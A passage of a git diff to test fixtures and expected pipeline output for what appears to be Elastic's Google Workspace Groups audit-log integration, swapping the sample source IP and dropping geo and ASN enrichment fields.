-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json index 63cd5fc6d1b..0f63c344638 100644 --- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json +++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log-expected.json @@ -2,31 +2,13 @@ "expected": [ { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +22,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -70,8 +52,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728236600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}", + "ingested": "2021-12-09T13:39:12.286029Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}", "provider": "groups", "action": "change_acl_permission", "id": "1", @@ -101,31 +83,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -139,7 +103,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -161,8 +125,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728241700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286032300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "accept_invitation", "id": "1", @@ -193,31 +157,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -232,7 +178,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -257,8 +203,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728243400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286037800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "approve_join_request", "id": "1", @@ -292,31 +238,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -330,7 +258,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -352,8 +280,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728245Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286042300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "join", "id": "1", @@ -384,31 +312,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -422,7 +332,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -444,8 +354,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728246500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286046800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "request_to_join", "id": "1", @@ -476,31 +386,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -514,7 +406,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -539,8 +431,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728248Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:39:12.286052100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}", "provider": "groups", "action": "change_basic_setting", "id": "1", @@ -571,31 +463,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -609,7 +483,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -631,8 +505,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728249400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286057300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "create_group", "id": "1", @@ -662,31 +536,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -700,7 +556,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -722,8 +578,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728251Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286062500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "delete_group", "id": "1", @@ -753,31 +609,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -791,7 +629,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -816,8 +654,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728252500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}", + "ingested": "2021-12-09T13:39:12.286067700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}", "provider": "groups", "action": "change_identity_setting", "id": "1", @@ -848,31 +686,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - 